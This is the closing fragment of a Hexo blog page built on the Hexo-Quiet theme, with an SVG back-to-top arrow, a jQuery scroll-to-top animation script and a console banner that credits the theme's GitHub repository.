        <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24">
            <g>
                <path d="M13 12v8h-2v-8H4l8-8 8 8z"></path>
            </g>
        </svg>
    </span>
</div>
<script>
    $('#js-go_top').gotoTop({ offset: 500, speed: 300, animationShow: { 'transform': 'translate(0,0)', 'transition': 'transform .5s ease-in-out' }, animationHide: { 'transform': 'translate(100px,0)', 'transition': 'transform .5s ease-in-out' } });
</script>
<script>
	console.log('\n %c Hexo-Quiet 主题 %c https://github.com/QiaoBug/hexo-theme-quiet \n', 'color: #fadfa3; background: #030307; padding:5px 0;', 'background: #fadfa3; padding:5px 0;')
</script>
	</body>

</html>